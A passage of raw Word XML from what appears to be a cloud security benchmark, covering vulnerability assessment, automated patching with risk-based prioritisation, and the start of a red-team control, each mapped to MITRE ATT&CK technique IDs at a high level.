      </w:r>
    </w:p>
    <w:p w14:paraId="0A5900F0" w14:textId="4B8DBB14" w:rsidR="0021039F" w:rsidRDefault="0021039F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0021039F">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8756F1" w14:textId="183E6586" w:rsidR="003649DB" w:rsidRDefault="003649DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003649DB">
        <w:t>exploitation for privilege escalation (T1068) targeting known vulnerabilities in operating systems and applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E943DE0" w14:textId="49AB5C08" w:rsidR="0021039F" w:rsidRDefault="0021039F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0021039F">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B16CB" w14:textId="5630F4F0" w:rsidR="003649DB" w:rsidRDefault="003649DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003649DB">
        <w:t>exploitation of remote services (T1021) using vulnerabilities to move between systems and networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E101D04" w14:textId="720953DD" w:rsidR="0021039F" w:rsidRDefault="0021039F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0021039F">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B66825D" w14:textId="7084990F" w:rsidR="003649DB" w:rsidRDefault="003649DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003649DB">
        <w:t>exploitation for defense evasion (T1562) leveraging vulnerabilities to disable or bypass security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E96C9B9" w14:textId="4769D265" w:rsidR="00C47351" w:rsidRDefault="00C644EE" w:rsidP="00C644EE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PV-5.1: Implement comprehensive vulnerability assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9F60DF" w14:textId="764FFD0C" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Identify and prioritize security weaknesses through comprehensive vulnerability assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5B821" w14:textId="54792A19" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Enable comprehensive vulnerability assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CB404D" w14:textId="4D58A9D0" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Deploy Microsoft Defender for Cloud vulnerability assessment for virtual machines, containers, and SQL databases to identify security weaknesses across all resource types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBA40D" w14:textId="08C263F4" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Use integrated vulnerability scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1972D8" w14:textId="3BAF364D" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Implement built-in vulnerability scanner for comprehensive VM assessment without requiring additional agent deployment or licensing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138B15D7" w14:textId="788274D3" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Integrate exposure management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E386632" w14:textId="390A2939" w:rsidR="00FA5DC3" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Use Microsoft Security Exposure Management to identify attack paths and prioritize vulnerabilities based on asset criticality and potential blast radius for risk-based remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154F0459" w14:textId="23C977D4" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Implement database vulnerability assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3825A0A3" w14:textId="6E95206F" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Deploy SQL vulnerability assessment for database security evaluation and configuration weakness identification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747FF8D" w14:textId="633DB886" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:t>Configure vulnerability tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218CE1E4" w14:textId="309725E3" w:rsidR="00C644EE" w:rsidRDefault="00C644EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="267"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C644EE">
        <w:lastRenderedPageBreak/>
        <w:t>Enable continuous export for tracking and trending analysis to measure remediation progress over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA99F71" w14:textId="57137E4D" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3" w:rsidP="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc242449552"/>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Remediate using risk-based prioritization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="59C8374C" w14:textId="12202942" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3" w:rsidP="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc242449553"/>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>PV-6: Rapidly and automatically remediate vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="5D4ADF6C" w14:textId="45597C7B" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2471EE08" w14:textId="22EF6309" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Rapidly and automatically deploy patches and updates to remediate vulnerabilities using risk-based prioritization that addresses the most severe vulnerabilities in highest-value assets first. Implement automated patching capabilities that balance security requirements with operational stability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1019B9E4" w14:textId="2AA6A255" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20831061" w14:textId="769B6D4A" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Extended exposure windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35357659" w14:textId="0463704D" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Critical vulnerabilities remain exploitable for days or weeks while manual patching processes progress-providing ample time for attackers to develop and deploy exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BFDACF" w14:textId="45A8E1BD" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Patch management delays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52055FAF" w14:textId="375A8014" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Complex approval workflows and testing requirements delay security updates, leaving systems vulnerable during extended remediation cycles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085F342" w14:textId="39FA0291" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Scale amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F56F0A9" w14:textId="54B902ED" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Cloud environments with hundreds or thousands of resources require automated patching to achieve timely remediation-manual processes cannot scale effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46975DF7" w14:textId="7219C6D6" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Business disruption risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E29FB4" w14:textId="14BE4B2E" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Fear of system downtime delays patching decisions, leaving vulnerabilities unaddressed while organizations debate operational impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14340D81" w14:textId="68EFB014" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Third-party software gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925FD8C" w14:textId="133C743A" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Applications and middleware not covered by operating system patching remain vulnerable longer due to complex update procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A956BA" w14:textId="7FDA3C2C" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Inconsistent prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4D4CD7" w14:textId="6AC018B3" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:lastRenderedPageBreak/>
        <w:t>Without risk-based remediation prioritization, critical vulnerabilities affecting high-value assets may not receive appropriate attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D2521" w14:textId="74FC5DFA" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Remediation verification gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076DBCD8" w14:textId="414EACE9" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Lack of post-patch validation leaves uncertainty about whether vulnerabilities were successfully addressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D48AB5" w14:textId="3A1AD0CF" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D7085" w14:textId="315E8B59" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B15FE89" w14:textId="4CC136C2" w:rsidR="00F57225" w:rsidRDefault="00F57225">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57225">
        <w:t>exploit public-facing application (T1190) targeting known vulnerabilities during extended remediation windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D73845" w14:textId="41E0D083" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653D9379" w14:textId="13F61E14" w:rsidR="00F57225" w:rsidRDefault="00F57225">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57225">
        <w:t>exploitation for privilege escalation (T1068) leveraging unpatched local vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002521B" w14:textId="7708F996" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE5B89" w14:textId="768A4F02" w:rsidR="00F57225" w:rsidRDefault="00F57225">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="435"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57225">
        <w:t>exploitation of remote services (T1021) using known vulnerabilities to spread between systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5B203" w14:textId="21BF17A8" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3" w:rsidP="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PV-6.1: Implement automated vulnerability remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE7DB5" w14:textId="096C0FA3" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="270"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Accelerate vulnerability remediation through automation and risk-based prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57578A18" w14:textId="16FED1E6" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Implement automated patch management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C24F7B9" w14:textId="414C3EC2" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Deploy Azure Update Manager for automated patching of Windows and Linux virtual machines across Azure VMs and Arc-enabled servers with centralized management capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0476EE29" w14:textId="6B42B69C" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Configure maintenance windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C08AFB8" w14:textId="18142895" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Set up update settings with maintenance windows aligned to business requirements to minimize impact on production workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3168BC" w14:textId="47D18F81" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Enable zero-downtime patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A3C0C5" w14:textId="6FC751A5" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Hotpatching</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t> for Windows Server 2025 to install security updates without requiring system reboots, reducing downtime and exposure windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672DB089" w14:textId="744F0D6E" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>Establish risk-based prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A20C2D" w14:textId="1B9681B7" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5DC3">
        <w:lastRenderedPageBreak/>
        <w:t>Prioritize vulnerability remediation considering vulnerability severity, asset criticality, and exposure level to focus on highest-risk issues first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E7770B" w14:textId="392466EC" w:rsidR="00FA5DC3" w:rsidRDefault="00FA5DC3" w:rsidP="00FA5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc242449554"/>
      <w:r w:rsidRPr="00FA5DC3">
        <w:t>PV-7: Conduct regular red team operations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="024120F6" w14:textId="52A930A3" w:rsidR="00125D68" w:rsidRDefault="00125D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00125D68">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235598A0" w14:textId="7CD783C2" w:rsidR="00125D68" w:rsidRDefault="00125D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00125D68">
        <w:t>Simulate real-world attacks through red team operations and penetration testing to provide comprehensive security validation. Follow industry best practices to design, prepare, and conduct testing safely while ensuring comprehensive scope and stakeholder coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159B0EE0" w14:textId="721A300A" w:rsidR="00125D68" w:rsidRDefault="00125D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="272"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00125D68">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00125D68">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5050CD40" w14:textId="636A8850" w:rsidR="00125D68" w:rsidRDefault="00125D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00125D68">
        <w:t>Blind spots in security controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513987C0" w14:textId="586C9050" w:rsidR="00125D68" w:rsidRDefault="00125D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00125D68">
        <w:t>Automated security tools and standard penetration tests fail to identify weaknesses that skilled attackers exploit through creative combinations of legitimate features and minor vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C4F837" w14:textId="2D00FF69" w:rsidR="00125D68" w:rsidRDefault="00125D68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00125D68">
        <w:t>False security confidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A39F1D" w14:textId="6ACD644D" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Organizations believing their security posture is strong based on compliance checkboxes and standard testing may be vulnerable to advanced persistent threats and targeted attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F974CDB" w14:textId="44A47A77" w:rsidR="00F707C5" w:rsidRDefault="00F707C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F707C5">
        <w:t>Human factor vulnerabilities</w:t>
      </w:r>
    </w:p>
